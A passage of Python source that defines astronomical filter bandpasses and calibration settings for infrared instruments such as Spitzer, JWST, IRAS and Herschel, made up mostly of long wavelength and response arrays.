.913333,0.920000,0.930000,0.943333,0.956667,0.966667,0.976667,0.983333,0.986667,0.990000,0.990000,0.990000,0.990000,0.990000,0.990000,0.990000,0.983333,0.980000,0.970000,0.956667,0.943333,0.926667,0.910000,0.896667,0.886667,0.880000,0.873333,0.873333,0.873333,0.873333,0.876667,0.876667,0.876667,0.876667,0.880000,0.886667,0.893333,0.906667,0.916667,0.933000,0.949667,0.959667,0.969667,0.976333,0.973000,0.969667,0.963000,0.953000,0.946333,0.939667,0.933000,0.929667,0.926333,0.923000,0.923000,0.919667,0.916333,0.909667,0.906333,0.899667,0.893000,0.890000,0.886667,0.883333,0.883333,0.880000,0.880000,0.876667,0.870000,0.866667,0.860000,0.853333,0.850000,0.843333,0.840000,0.840000,0.840000,0.840000,0.840000,0.836667,0.833333,0.830000,0.823333,0.816667,0.810000,0.800000,0.796667,0.790000,0.786667,0.786667,0.783333,0.780000,0.776667,0.770000,0.763333,0.753333,0.740000,0.726667,0.713333,0.700000,0.690000,0.683333,0.676667,0.673333,0.673333,0.670000,0.666667,0.663333,0.660000,0.653333,0.650000,0.646667,0.643333,0.643333,0.643333,0.650000,0.653333,0.660000,0.663333,0.670000,0.670000,0.670000,0.670000,0.666667,0.663333,0.663333,0.663333,0.663333,0.666667,0.670000,0.673333,0.676667,0.676667,0.673333,0.673333,0.666667,0.660000,0.650000,0.643333,0.636667,0.633333,0.630000,0.630000,0.630000,0.633333,0.633333,0.636667,0.640000,0.639667,0.639667,0.639667,0.643000,0.643000,0.649667,0.653000,0.659667,0.666333,0.673000,0.676333,0.679667,0.679667,0.676333,0.676333,0.673000,0.666333,0.663000,0.659667,0.656667,0.653333,0.653333,0.650000,0.643333,0.640000,0.633333,0.623333,0.616667,0.603333,0.590000,0.580000,0.566667,0.556667,0.546667,0.540000,0.533333,0.530000,0.523333,0.516667,0.513333,0.506667,0.500000,0.493333,0.486667,0.480000,0.473333,0.470000,0.466667,0.463333,0.460000,0.460000,0.456667,0.453333,0.450000,0.443333,0.436667,0.430000,0.423333,0.413333,0.406667,0.403333,0.396667,0.393333,0.393333,0.390000,0.390000,0.393333,0.393333,0.393333,0.393333,0.393333,0.393333,0.393333,0.393333,0.393333,0.396667,0.396667,0.400000,0.403333,0.406667,0.406667,0.406667,0.406667,0.406667,0.403333,0.403333,0.400000,0.400000,0.396667,0.396667,0.400000,0.400000,0.403333,0.410000,0.413333,0.420000,0.423333,0.426667,0.430000,0.433333,0.436667,0.440000,0.440000,0.443333,0.446667,0.450000,0.453333,0.460000,0.463333,0.470000,0.476667,0.480000,0.483333,0.483333,0.486667,0.486667,0.486667,0.486667,0.486667,0.486667,0.486667,0.490000,0.493333,0.496667,0.500000,0.503333,0.503333,0.503333,0.503333,0.500000,0.500000,0.496667,0.493333,0.490000,0.490000,0.486667,0.486667,0.490000,0.493333,0.493333,0.496667,0.496667,0.500000,0.500000,0.500000,0.500000,0.496667,0.496667,0.493333,0.493333,0.493333,0.490000,0.490000,0.490000,0.486667,0.486667,0.483333,0.480000,0.473667,0.470333,0.463667,0.457000,0.450333,0.443667,0.437000,0.430333,0.427000,0.423667,0.420333,0.420333,0.420333,0.417000,0.417000,0.417000,0.413667,0.410333,0.410333,0.407000,0.400333,0.397000,0.393667,0.390333,0.390333,0.387000,0.387000,0.387000,0.387000,0.387000,0.383667,0.383667,0.380333,0.377000,0.373667,0.367000,0.363667,0.360333,0.357000,0.353667,0.350333,0.350333,0.347000,0.343667,0.343667,0.340333,0.337000,0.333333,0.329733,0.324400,0.318767,0.313100,0.307133,0.301167,0.295167,0.290200,0.285900,0.281600,0.278267,0.275600,0.272933,0.270567,0.268533,0.266500,0.264467,0.262800,0.260800,0.259133,0.257500,0.256200,0.254900,0.254267,0.253633,0.253333,0.253667,0.254000,0.254000,0.254000,0.254000,0.253667,0.252000,0.250633,0.248633,0.245967,0.243267,0.240600,0.237933,0.235233,0.232900,0.230900,0.228900,0.226900,0.224900,0.222267,0.219933,0.216300,0.212000,0.208000,0.203033,0.197400,0.192100,0.186800,0.182167,0.177533,0.173533,0.170900,0.168567,0.166267,0.164600,0.162933,0.161300,0.158633,0.155333,0.152367,0.148067,0.143133,0.137867,0.132567,0.126933,0.121333,0.116033,0.112033,0.107700,0.104033,0.102433,0.100800,0.0992000,0.0992667,0.0993667,0.0997667,0.100500,0.101533,0.102933,0.103967,0.105600,0.106933,0.108567,0.110167,0.111767,0.113400,0.114367,0.115667,0.116667,0.117000,0.117300,0.117333,0.117000,0.116033,0.114733,0.113467,0.111500,0.109567,0.107633,0.105400,0.103133,0.100900,0.0990000,0.0971000,0.0952333,0.0933667,0.0915333,0.0899667,0.0880667,0.0861667,0.0842333,0.0820333,0.0794333,0.0767667,0.0741667,0.0715000,0.0691000,0.0667000,0.0646000,0.0634667,0.0626000,0.0614667,0.0620000,0.0622667,0.0628333,0.0635000,0.0642000,0.0649000,0.0652667,0.0656000,0.0656333,0.0656667,0.0656667,0.0653667,0.0650333,0.0650667,0.0650667,0.0650667,0.0651000,0.0651667,0.0652333,0.0652667,0.0643667,0.0635000,0.0626000,0.0611333,0.0589667,0.0568000,0.0546667,0.0524667,0.0499667,0.0477333,0.0452000,0.0431667,0.0409000,0.0386667,0.0364000,0.0341667,0.0319000,0.0297400,0.0275833,0.0253667,0.0237300,0.0234867,0.0229767,0.0220867,0.0799000,0.0889333,0.0887333,0.0896667,0.0867000,0.0837333,0.0810667,0.0784000,0.0757333,0.0731333,0.0701667,0.0670667,0.0641000,0.0612667,0.0585333,0.0560000,0.0535333,0.0511667,0.0489667,0.0468333,0.0448000,0.0428667,0.0409333,0.0391000,0.0373667,0.0356667,0.0340000,0.0319900,0.0296733,0.0273733,0.0239900,0.0146633,0.0157133,0.0169200,0.0183433,0.0193867,0.0204467,0.0215200,0.0222533,0.0226367,0.0229467,0.0232767,0.0231633,0.0230633,0.0229467,0.0227167,0.0224200,0.0221600,0.0219167,0.0214500,0.0208700,0.0203533,0.0196467,0.0182533,0.0168700,0.0155700,0.0137000,0.0116500,0.00979333,0.00798000,0.00476000,0.00282900,0.00171433,0.00132567,0.00267667,0.00356333,0.00467000,0.00599667,0.00701667,0.00728333,0.00747667,0.00774333,0.00782333,0.00784000,0.00786333,0.00789667,0.00785000,0.00784000,0.00783667,0.00771333,0.00709667,0.00656667,0.00605333,0.00506000,0.00371000,0.00269700,0.00197233]}
# AKARI, already converted to energy. Based on flux ratio plot against
# flux (where factor 0.98 was already applied), add 18um calibration
# conversion
def s18_cal_func(x):
"""Calibration to non-constant part, by eye."""
if x < 5.0:
return (x/5)**0.02
else:
return 1.0
filters['AKARI9'] = {'svo_name': 'AKARI/IRC.S9W',
'response_type': 'energy',
'ref_wavelength': 9.0,
'ref_spectrum': lambda nu: 1.0/nu}
filters['AKARI18'] = {'svo_name': 'AKARI/IRC.L18W',
'response_type': 'energy',
'ref_wavelength': 18.0,
'measurement_calibration': lambda x: x*0.98*s18_cal_func(x),
'ref_spectrum': lambda nu: 1.0/nu}
# Spitzer, IRAC/IRS PUI is photon counting, MIPS energy
# IRAC/IRS ref spectrum F_nu oc 1/nu, MIPS 10k BB
filters['IRAC3P6'] = {'svo_name': 'Spitzer/IRAC.I1',
'response_type': 'photon',
'ref_wavelength': 3.550,
'ref_spectrum': lambda nu: 1.0/nu}
filters['IRAC4P5'] = {'svo_name': 'Spitzer/IRAC.I2',
'response_type': 'photon',
'ref_wavelength': 4.493,
'ref_spectrum': lambda nu: 1.0/nu}
filters['IRAC5P8'] = {'svo_name': 'Spitzer/IRAC.I3',
'response_type': 'photon',
'ref_wavelength': 5.731,
'ref_spectrum': lambda nu: 1.0/nu}
filters['IRAC8'] = {'svo_name': 'Spitzer/IRAC.I4',
'response_type': 'photon',
'ref_wavelength': 7.872,
'ref_spectrum': lambda nu: 1.0/nu}
filters['IRSPUB'] = {
'magnitude_system': 'Vega',
'zero_point': 0.00000,
'zero_point_ref': 'bla',
'ref_wavelength': 15.8,
'ref_spectrum': lambda nu: 1.0/nu,
'response_type': 'photon',
'response_ref': 'http://irsa.ipac.caltech.edu/data/SPITZER/docs/\
dataanalysistools/cookbook/14/',
'wav_micron':[12.288, 12.317, 12.346, 12.376, 12.405, 12.435,
12.465, 12.495, 12.525, 12.555, 12.586, 12.616, 12.647, 12.678, 12.709,
12.741, 12.772, 12.803, 12.835, 12.867, 12.899, 12.931, 12.964, 12.996,
13.029, 13.061, 13.094, 13.128, 13.161, 13.194, 13.228, 13.262, 13.296,
13.330, 13.364, 13.399, 13.434, 13.469, 13.504, 13.539, 13.574, 13.610,
13.646, 13.682, 13.718, 13.754, 13.791, 13.828, 13.865, 13.902, 13.939,
13.977, 14.015, 14.052, 14.091, 14.129, 14.168, 14.207, 14.246, 14.285,
14.324, 14.364, 14.404, 14.444, 14.484, 14.525, 14.566, 14.607, 14.648,
14.689, 14.731, 14.773, 14.815, 14.858, 14.901, 14.943, 14.987, 15.030,
15.074, 15.118, 15.162, 15.206, 15.251, 15.296, 15.341, 15.387, 15.433,
15.479, 15.525, 15.572, 15.619, 15.666, 15.713, 15.761, 15.809, 15.857,
15.906, 15.955, 16.004, 16.054, 16.104, 16.154, 16.204, 16.255, 16.306,
16.358, 16.409, 16.462, 16.514, 16.567, 16.620, 16.673, 16.727, 16.781,
16.836, 16.890, 16.946, 17.001, 17.057, 17.114, 17.170, 17.227, 17.285,
17.342, 17.401, 17.459, 17.518, 17.578, 17.637, 17.698, 17.758, 17.819,
17.881, 17.942, 18.005, 18.067, 18.131, 18.194, 18.258, 18.323, 18.388,
18.453, 18.519, 18.586, 18.653, 18.720, 18.788, 18.856, 18.925, 18.994,
19.064, 19.134, 19.205, 19.277, 19.348, 19.421],
'response':[0.001, 0.002, 0.003, 0.002, 0.002, 0.002, 0.002, 0.001,
0.002, 0.002, 0.002, 0.004, 0.006, 0.009, 0.011, 0.013, 0.018, 0.026,
0.038, 0.060, 0.077, 0.093, 0.107, 0.132, 0.171, 0.219, 0.290, 0.355,
0.432, 0.503, 0.578, 0.639, 0.676, 0.706, 0.723, 0.720, 0.709, 0.723,
0.736, 0.764, 0.791, 0.861, 0.909, 0.939, 0.946, 0.963, 0.936, 0.932,
0.936, 0.949, 0.953, 0.963, 0.963, 0.959, 0.953, 0.943, 0.929, 0.929,
0.929, 0.936, 0.936, 0.939, 0.949, 0.953, 0.939, 0.949, 0.959, 0.970,
0.976, 0.990, 1.000, 0.993, 0.993, 0.983, 0.966, 0.936, 0.916, 0.895,
0.882, 0.865, 0.845, 0.828, 0.807, 0.794, 0.784, 0.770, 0.764, 0.760,
0.767, 0.797, 0.828, 0.848, 0.872, 0.902, 0.902, 0.892, 0.882, 0.875,
0.858, 0.841, 0.831, 0.814, 0.797, 0.784, 0.774, 0.770, 0.777, 0.784,
0.787, 0.787, 0.791, 0.791, 0.791, 0.784, 0.774, 0.770, 0.767, 0.764,
0.770, 0.787, 0.794, 0.780, 0.794, 0.818, 0.821, 0.841, 0.845, 0.845,
0.841, 0.804, 0.770, 0.757, 0.750, 0.753, 0.747, 0.736, 0.740, 0.757,
0.747, 0.740, 0.760, 0.747, 0.703, 0.635, 0.530, 0.399, 0.271, 0.169,
0.095, 0.056, 0.033, 0.020, 0.013, 0.009, 0.005, 0.002]}
filters['IRSPUR'] = {
'magnitude_system': 'Vega',
'zero_point': 0.00000,
'zero_point_ref': 'bla',
'ref_wavelength': 22.3,
'ref_spectrum': lambda nu: 1.0/nu,
'response_type': 'photon',
'response_ref': 'http://irsa.ipac.caltech.edu/data/SPITZER/docs/\
dataanalysistools/cookbook/14/',
'wav_micron':[17.170, 17.227, 17.285, 17.342, 17.401, 17.459,
17.518, 17.578, 17.637, 17.698, 17.758, 17.819, 17.881, 17.942, 18.005,
18.067, 18.131, 18.194, 18.258, 18.323, 18.388, 18.453, 18.519, 18.586,
18.653, 18.720, 18.788, 18.856, 18.925, 18.994, 19.064, 19.134, 19.205,
19.277, 19.348, 19.421, 19.494, 19.567, 19.642, 19.716, 19.792, 19.867,
19.944, 20.021, 20.098, 20.177, 20.255, 20.335, 20.415, 20.496, 20.577,
20.659, 20.742, 20.825, 20.909, 20.993, 21.079, 21.165, 21.252, 21.339,
21.427, 21.516, 21.606, 21.696, 21.787, 21.879, 21.972, 22.066, 22.160,
22.255, 22.351, 22.448, 22.545, 22.644, 22.743, 22.843, 22.944, 23.046,
23.149, 23.253, 23.358, 23.463, 23.570, 23.677, 23.786, 23.896, 24.006,
24.118, 24.231, 24.344, 24.459, 24.575, 24.692, 24.810, 24.930, 25.050,
25.172, 25.295, 25.419, 25.544, 25.670, 25.798, 25.927, 26.057, 26.189,
26.322, 26.456, 26.592, 26.729, 26.867, 27.007, 27.149, 27.292, 27.436,
27.582, 27.729, 27.878, 28.029, 28.181, 28.335, 28.491, 28.649, 28.808,
28.969, 29.131, 29.296, 29.462, 29.631, 29.801, 29.973, 30.147, 30.324,
30.502, 30.683, 30.865, 31.050, 31.237, 31.427, 31.618, 31.812, 32.008,
32.207, 32.409, 32.612, 32.819, 33.028, 33.240, 33.454, 33.671, 33.891,
34.114, 34.340, 34.569, 34.801, 35.036],
'response':[ 0.001, 0.000, 0.002, 0.003, 0.004, 0.007, 0.003, 0.004,
0.006, 0.005, 0.001, 0.006, 0.003, 0.005, 0.008, 0.015, 0.025, 0.040,
0.059, 0.094, 0.149, 0.238, 0.351, 0.500, 0.651, 0.780, 0.862, 0.931,
0.954, 0.986, 1.000, 0.959, 0.913, 0.904, 0.940, 0.950, 0.945, 0.959,
1.000, 0.991, 0.995, 0.972, 0.986, 0.954, 0.945, 0.931, 0.922, 0.913,
0.908, 0.899, 0.885, 0.872, 0.858, 0.849, 0.849, 0.853, 0.862, 0.881,
0.894, 0.904, 0.913, 0.922, 0.922, 0.922, 0.917, 0.913, 0.904, 0.899,
0.890, 0.881, 0.862, 0.844, 0.830, 0.821, 0.812, 0.812, 0.817, 0.817,
0.803, 0.789, 0.771, 0.748, 0.729, 0.725, 0.739, 0.761, 0.784, 0.803,
0.817, 0.817, 0.798, 0.789, 0.766, 0.748, 0.725, 0.706, 0.679, 0.651,
0.619, 0.592, 0.555, 0.523, 0.491, 0.459, 0.430, 0.398, 0.378, 0.356,
0.336, 0.318, 0.304, 0.284, 0.266, 0.247, 0.226, 0.204, 0.185, 0.167,
0.154, 0.137, 0.124, 0.109, 0.098, 0.084, 0.077, 0.068, 0.061, 0.053,
0.046, 0.039, 0.032, 0.026, 0.020, 0.013, 0.008, 0.005, 0.004, 0.003,
0.002, 0.002, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000,-0.000,-0.000]}
filters['MIPS24'] = {'svo_name': 'Spitzer/MIPS.24mu',
'response_type': 'energy',
'ref_wavelength': 23.675,
'ref_spectrum': lambda nu: utils.bnu_nu_hz(nu,10000.0)}
filters['MIPS70'] = {'svo_name': 'Spitzer/MIPS.70mu',
'response_type': 'energy',
'ref_wavelength': 71.42,
'ref_spectrum': lambda nu: utils.bnu_nu_hz(nu,10000.0)}
filters['MIPS160'] = {'svo_name': 'Spitzer/MIPS.160mu',
'response_type': 'energy',
'ref_wavelength': 155.9,
'ref_spectrum': lambda nu: utils.bnu_nu_hz(nu,10000.0)}
# JWST NIRCAM, units of electrons/photon
nrc_filt_loc = os.path.dirname(os.path.abspath(__file__))+ \
'/data/filters/nircam/'
for file in glob.glob(nrc_filt_loc+'*.txt'):
filt_name = 'NIRCAM.'+os.path.basename(file).split('_')[0]
filters[filt_name] = {
'magnitude_system': 'Vega',
'response_type':'photon',
'ref_wavelength': None,
'ref_spectrum': None,
'response_ref': 'https://jwst-docs.stsci.edu/display/JTI/NIRCam+Filters',
'wav_micron': np.loadtxt(file,skiprows=1,usecols=0),
'response': np.loadtxt(file,skiprows=1,usecols=1)
}
# JWST MIRI, units of electrons/photon
miri_file = os.path.dirname(os.path.abspath(__file__))+ \
'/data/filters/ImPCE_TN-00072-ATC-Iss2.csv'
for i,filt in enumerate(['F560W','F770W','F1000W','F1280W','F1130W',
'F1500W','F1800W','F2100W','F2550W']):
filt_name = 'MIRI.'+filt
filters[filt_name] = {
'magnitude_system': 'Vega',
'response_type':'photon',
'ref_wavelength': None,
'ref_spectrum': None,
'response_ref': 'https://jwst-docs.stsci.edu/display/JTI/MIRI+Filters+and+Dispersers',
'wav_micron': np.loadtxt(miri_file,delimiter=',',skiprows=2,usecols=0),
'response': np.loadtxt(miri_file,delimiter=',',skiprows=2,usecols=i+1)
}
# IRAS, RSRs, calibrations empirical, and see Rieke+2008
filters['IRAS12'] = {'svo_name': 'IRAS/IRAS.12mu',
'response_type': 'energy',
'ref_wavelength': 12.0,
'measurement_calibration': lambda x: 0.976*x,
'ref_spectrum': lambda nu: 1.0/nu}
filters['IRAS25'] = {'svo_name': 'IRAS/IRAS.25mu',
'response_type': 'energy',
'ref_wavelength': 25.0,
'measurement_calibration': lambda x: 0.94*x,
'ref_spectrum': lambda nu: 1.0/nu}
filters['IRAS60'] = {'svo_name': 'IRAS/IRAS.60mu',
'response_type': 'energy',
'ref_wavelength': 60.0,
'ref_spectrum': lambda nu: 1.0/nu}
filters['IRAS100'] = {'svo_name': 'IRAS/IRAS.100mu',
'response_type': 'energy',
'ref_wavelength': 100.0,
'ref_spectrum': lambda nu: 1.0/nu}
# MSX, RSRs, ref spectrum is F_nu oc 1/nu^2
filters['MSX8'] = {'svo_name': 'MSX/MSX.A',
'response_type': 'energy',
'ref_wavelength': 8.28,
'ref_spectrum': lambda nu: 1.0/nu}
filters['MSX12'] = {'svo_name': 'MSX/MSX.C',
'response_type': 'energy',
'ref_wavelength': 12.13,
'ref_spectrum': lambda nu: 1.0/nu}
filters['MSX15'] = {'svo_name': 'MSX/MSX.D',
'response_type': 'energy',
'ref_wavelength': 14.65,
'ref_spectrum': lambda nu: 1.0/nu}
filters['MSX21'] = {'svo_name': 'MSX/MSX.E',
'response_type': 'energy',
'ref_wavelength': 21.34,
'ref_spectrum': lambda nu: 1.0/nu}
# PACS/SPIRE, RSRs, ref spectrum F_nu oc 1/nu
filters['PACS70'] = {'svo_name': 'Herschel/Pacs.blue',
'response_type': 'energy',
'ref_wavelength': 70.0,
'ref_spectrum': lambda nu: 1.0/nu}
filters['PACS100'] = {'svo_name': 'Herschel/Pacs.green',
'response_type': 'energy',
'ref_wavelength': 100.0,
'ref_spectrum': lambda nu: 1.0/nu}
filters['PACS160'] = {'svo_name': 'Herschel/Pacs.red',
'response_type': 'energy',
'ref_wavelength': 160.0,
'ref_spectrum': lambda nu: 1.0/nu}
filters['SPIRE250'] = {'svo_name': 'Herschel/SPIRE.PSW',
'response_type': 'energy',
'ref_wavelength': 250.0,
'ref_spectrum': lambda nu: 1.0/nu}
filters['SPIRE350'] = {'svo_name': 'Herschel/SPIRE.PMW',
'response_type': 'energy',
'ref_wavelength': 350.0,
'ref_spectrum': lambda nu: 1.0/nu}
filters['SPIRE500'] = {'svo_name': 'Herschel/SPIRE.PLW',
'response_type': 'energy',
'ref_wavelength': 500.0,
'ref_spectrum': lambda nu: 1.0/nu}
# LBTI NOMIC N, assume QE based
filters['NOMICN'] = {
'magnitude_system': 'Vega',
'zero_point': 31.3207,
'zero_point_ref': 'bla',
'ref_wavelength': None,
'ref_spectrum': None,
'response_type': 'photon',
'response_ref': 'bla',
'wav_micron':[
9.000, 9.001, 9.002, 9.003, 9.004, 9.005, 9.006, 9.007, 9.008,
9.009, 9.010, 9.011, 9.012, 9.013, 9.014, 9.015, 9.016, 9.017,
9.018, 9.019, 9.020, 9.021, 9.022, 9.023, 9.024, 9.025, 9.026,
9.027, 9.028, 9.029, 9.030, 9.031, 9.032, 9.033, 9.034, 9.035,
9.036, 9.037, 9.038, 9.039, 9.040, 9.041, 9.042, 9.043, 9.044,
9.045, 9.046, 9.047, 9.048, 9.049, 9.050, 9.051, 9.052, 9.053,
9.054, 9.055, 9.056, 9.057, 9.058, 9.059, 9.060, 9.061, 9.062,
9.063, 9.064, 9.065, 9.066, 9.067, 9.068, 9.069, 9.070, 9.071,
9.072, 9.073, 9.074, 9.075, 9.076, 9.077, 9.078, 9.079, 9.080,
9.081, 9.082, 9.083, 9.084, 9.085, 9.086, 9.087, 9.088, 9.089,
9.090, 9.091, 9.092, 9.093, 9.094, 9.095, 9.096, 9.097, 9.098,
9.099, 9.100, 9.101, 9.102, 9.103, 9.104, 9.105, 9.106, 9.107,
9.108, 9.109, 9.110, 9.111, 9.112, 9.113, 9.114, 9.115, 9.116,
9.117, 9.118, 9.119, 9.120, 9.121, 9.122, 9.123, 9.124, 9.125,
9.126, 9.127, 9.128, 9.129, 9.130, 9.131, 9.132, 9.133, 9.134,
9.135, 9.136, 9.137, 9.138, 9.139, 9.140, 9.141, 9.142, 9.143,
9.144, 9.145, 9.146, 9.147, 9.148, 9.149, 9.150, 9.151, 9.152,
9.153, 9.154, 9.155, 9.156, 9.157, 9.158, 9.159, 9.160, 9.161,
9.162, 9.163, 9.164, 9.165, 9.166, 9.167, 9.168, 9.169, 9.170,
9.171, 9.172, 9.173, 9.174, 9.175, 9.176, 9.177, 9.178, 9.179,
9.180, 9.181, 9.182, 9.183, 9.184, 9.185, 9.186, 9.187, 9.188,
9.189, 9.190, 9.191, 9.192, 9.193, 9.194, 9.195, 9.196, 9.197,
9.198, 9.199, 9.200, 9.201, 9.202, 9.203, 9.204, 9.205, 9.206,
9.207, 9.208, 9.209, 9.210, 9.211, 9.212, 9.213, 9.214, 9.215,
9.216, 9.217, 9.218, 9.219, 9.220, 9.221, 9.222, 9.223, 9.224,
9.225, 9.226, 9.227, 9.228, 9.229, 9.230, 9.231, 9.232, 9.233,
9.234, 9.235, 9.236, 9.237, 9.238, 9.239, 9.240, 9.241, 9.242,
9.243, 9.244, 9.245, 9.246, 9.247, 9.248, 9.249, 9.250, 9.251,
9.252, 9.253, 9.254, 9.255, 9.256, 9.257, 9.258, 9.259, 9.260,
9.261, 9.262, 9.263, 9.264, 9.265, 9.266, 9.267, 9.268, 9.269,
9.270, 9.271, 9.272, 9.273, 9.274, 9.275, 9.276, 9.277, 9.278,
9.279, 9.280, 9.281, 9.282, 9.283, 9.284, 9.285, 9.286, 9.287,
9.288, 9.289, 9.290, 9.291, 9.292, 9.293, 9.294, 9.295, 9.296,
9.297, 9.298, 9.299, 9.300, 9.301, 9.302, 9.303, 9.304, 9.305,
9.306, 9.307, 9.308, 9.309, 9.310, 9.311, 9.312, 9.313, 9.314,
9.315, 9.316, 9.317, 9.318, 9.319, 9.320, 9.321, 9.322, 9.323,
9.324, 9.325, 9.326, 9.327, 9.328, 9.329, 9.330, 9.331, 9.332,
9.333, 9.334, 9.335, 9.336, 9.337, 9.338, 9.339, 9.340, 9.341,
9.342, 9.343, 9.344, 9.345, 9.346, 9.347, 9.348, 9.349, 9.350,
9.351, 9.352, 9.353, 9.354, 9.355, 9.356, 9.357, 9.358, 9.359,
9.360, 9.361, 9.362, 9.363, 9.364, 9.365, 9.366, 9.367, 9.368,
9.369, 9.370, 9.371, 9.372, 9.373, 9.374, 9.375, 9.376, 9.377,
9.378, 9.379, 9.380, 9.381, 9.382, 9.383, 9.384, 9.385, 9.386,
9.387, 9.388, 9.389, 9.390, 9.391, 9.392, 9.393, 9.394, 9.395,
9.396, 9.397, 9.398, 9.399, 9.400, 9.401, 9.402, 9.403, 9.404,
9.405, 9.406, 9.407, 9.408, 9.409, 9.410, 9.411, 9.412, 9.413,
9.414, 9.415, 9.416, 9.417, 9.418, 9.419, 9.420, 9.421, 9.422,
9.423, 9.424, 9.425, 9.426, 9.427, 9.428, 9.429, 9.430, 9.431,
9.432, 9.433, 9.434, 9.435, 9.436, 9.437, 9.438, 9.439, 9.440,
9.441, 9.442, 9.443, 9.444, 9.445, 9.446, 9.447, 9.448, 9.449,
9.450, 9.451, 9.452, 9.453, 9.454, 9.455, 9.456, 9.457, 9.458,
9.459, 9.460, 9.461, 9.462, 9.463, 9.464, 9.465, 9.466, 9.467,
9.468, 9.469, 9.470, 9.471, 9.472, 9.473, 9.474, 9.475, 9.476,
9.477, 9.478, 9.479, 9.480, 9.481, 9.482, 9.483, 9.484, 9.485,
9.486, 9.487, 9.488, 9.489, 9.490, 9.491, 9.492, 9.493, 9.494,
9.495, 9.496, 9.497, 9.498, 9.499, 9.500, 9.501, 9.502, 9.503,
9.504, 9.505, 9.506, 9.507, 9.508, 9.509, 9.510, 9.511, 9.512,
9.513, 9.514, 9.515, 9.516, 9.517, 9.518, 9.519, 9.520, 9.521,
9.522, 9.523, 9.524, 9.525, 9.526, 9.527, 9.528, 9.529, 9.530,
9.531, 9.532, 9.533, 9.534, 9.535, 9.536, 9.537, 9.538, 9.539,
9.540, 9.541, 9.542, 9.543, 9.544, 9.545, 9.546, 9.547, 9.548,
9.549, 9.550, 9.551, 9.552, 9.553, 9.554, 9.555, 9.556, 9.557,
9.558, 9.559, 9.560, 9.561, 9.562, 9.563, 9.564, 9.565, 9.566,
9.567, 9.568, 9.569, 9.570, 9.571, 9.572, 9.573, 9.574, 9.575,
9.576, 9.577, 9.578, 9.579, 9.580, 9.581, 9.582, 9.583, 9.584,
9.585, 9.586, 9.587, 9.588, 9.589, 9.590, 9.591, 9.592, 9.593,
9.594, 9.595, 9.596, 9.597, 9.598, 9.599, 9.600, 9.601, 9.602,
9.603, 9.604, 9.605, 9.606, 9.607, 9.608, 9.609, 9.610, 9.611,
9.612, 9.613, 9.614, 9.615, 9.616, 9.617, 9.618, 9.619, 9.620,
9.621, 9.622, 9.623, 9.624, 9.625, 9.626, 9.627, 9.628, 9.629,
9.630, 9.631, 9.632, 9.633, 9.634, 9.635, 9.636, 9.637, 9.638,
9.639, 9.640, 9.641, 9.642, 9.643, 9.644, 9.645, 9.646, 9.647,
9.648, 9.649, 9.650, 9.651, 9.652, 9.653, 9.654, 9.655, 9.656,
9.657, 9.658, 9.659, 9.660, 9.661, 9.662, 9.663, 9.664, 9.665,
9.666, 9.667, 9.668, 9.669, 9.670, 9.671, 9.672, 9.673, 9.674,
9.675, 9.676, 9.677, 9.678, 9.679, 9.680, 9.681, 9.682, 9.683,
9.684, 9.685, 9.686, 9.687, 9.688, 9.689, 9.690, 9.691, 9.692,
9.693, 9.694, 9.695, 9.696, 9.697, 9.698, 9.699, 9.700, 9.701,
9.702, 9.703, 9.704, 9.705, 9.706, 9.707, 9.708, 9.709, 9.710,
9.711, 9.712, 9.713, 9.714, 9.715, 9.716, 9.717, 9.718, 9.719,
9.720, 9.721, 9.722, 9.723, 9.724, 9.725, 9.726, 9.727, 9.728,
9.729, 9.730, 9.731, 9.732, 9.733, 9.734, 9.735, 9.736, 9.737,
9.738, 9.739, 9.740, 9.741, 9.742, 9.743, 9.744, 9.745, 9.746,
9.747, 9.748, 9.749, 9.750, 9.751, 9.752, 9.753, 9.754, 9.755,
9.756, 9.757, 9.758, 9.759, 9.760, 9.761, 9.762, 9.763, 9.764,
9.765, 9.766, 9.767, 9.768, 9.769, 9.770, 9.771, 9.772, 9.773,
9.774, 9.775, 9.776, 9.777, 9.778, 9.779, 9.780, 9.781, 9.782,
9.783, 9.784, 9.785, 9.786, 9.787, 9.788, 9.789, 9.790, 9.791,
9.792, 9.793, 9.794, 9.795, 9.796, 9.797, 9.798, 9.799, 9.800,
9.801, 9.802, 9.803, 9.804, 9.805, 9.806, 9.807, 9.808, 9.809,
9.810, 9.811, 9.812, 9.813, 9.814, 9.815, 9.816, 9.817, 9.818,
9.819, 9.820, 9.821, 9.822, 9.823, 9.824, 9.825, 9.826, 9.827,
9.828, 9.829, 9.830, 9.831, 9.832, 9.833, 9.834, 9.835, 9.836,
9.837, 9.838, 9.839, 9.840, 9.841, 9.842, 9.843, 9.844, 9.845,
9.846, 9.847, 9.848, 9.849, 9.850, 9.851, 9.852, 9.853, 9.854,
9.855, 9.856, 9.857, 9.858, 9.859, 9.860, 9.861, 9.862, 9.863,
9.864, 9.865, 9.866, 9.867, 9.868, 9.869, 9.870, 9.871, 9.872,
9.873, 9.874, 9.875, 9.876, 9.877, 9.878, 9.879, 9.880, 9.881,
9.882, 9.883, 9.884, 9.885, 9.886, 9.887, 9.888, 9.889, 9.890,
9.891, 9.892, 9.893, 9.894, 9.895, 9.896, 9.897, 9.898, 9.899,
9.900, 9.901, 9.902, 9.903, 9.904, 9.905, 9.906, 9.907, 9.908,
9.909, 9.910, 9.911, 9.912, 9.913, 9.914, 9.915, 9.916, 9.917,
9.918, 9.919, 9.920, 9.921, 9.922, 9.923, 9.924, 9.925, 9.926,
9.927, 9.928, 9.929, 9.930, 9.931, 9.932, 9.933, 9.934, 9.935,
9.936, 9.937, 9.938, 9.939, 9.940, 9.941, 9.942, 9.943, 9.944,
9.945, 9.946, 9.947, 9.948, 9.949, 9.950, 9.951, 9.952, 9.953,
9.954, 9.955, 9.956, 9.957, 9.958, 9.959, 9.960, 9.961, 9.962,
9.963, 9.964, 9.965, 9.966, 9.967, 9.968, 9.969, 9.970, 9.971,
9.972, 9.973, 9.974, 9.975, 9.976, 9.977, 9.978, 9.979, 9.980,
9.981, 9.982, 9.983, 9.984, 9.985, 9.986, 9.987, 9.988, 9.989,
9.990, 9.991, 9.992, 9.993, 9.994, 9.995, 9.996, 9.997, 9.998,
9.999, 10.000, 10.001, 10.002, 10.003, 10.004, 10.005, 10.006, 10.007,
10.008, 10.009, 10.010, 10.011, 10.012, 10.013, 10.014, 10.015, 10.016,
10.017, 10.018, 10.019, 10.020, 10.021, 10.022, 10.023, 10.024, 10.025,
10.026, 10.027, 10.028, 10.029, 10.030, 10.031, 10.032, 10.033, 10.034,
10.035, 10.036, 10.037, 10.038, 10.039, 10.040, 10.041, 10.042, 10.043,
